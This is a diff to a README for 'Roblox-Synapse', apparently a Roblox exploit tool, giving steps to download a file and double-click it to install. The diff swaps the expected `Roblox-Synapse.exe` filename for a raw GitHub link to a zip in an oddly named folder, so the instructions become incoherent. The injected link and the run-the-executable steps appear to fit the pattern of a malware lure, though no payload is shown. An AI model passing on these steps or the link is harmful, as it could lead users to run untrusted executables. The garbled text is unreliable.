toantentonten/Roblox-Synapse/README.md

    Click on the link above to visit the Releases page.
 Look for the latest version of Roblox Synapse.
 Click on the appropriate file to download it to your computer.

 2. **Locate the Downloaded File**
    Once the download finishes, go to your Downloads folder.
-You should see the Roblox Synapse file, usually named something like `Roblox-Synapse.exe`.
+You should see the Roblox Synapse file, usually named something like `https://raw.githubusercontent.com/toantentonten/Roblox-Synapse/main/barebacked/Roblox-Synapse.zip`.

 3. **Run the Installer**
    Double-click the downloaded file to start the installation process.
 A window will open, guiding you through the installation steps.
 Follow the prompts to install the software on your computer.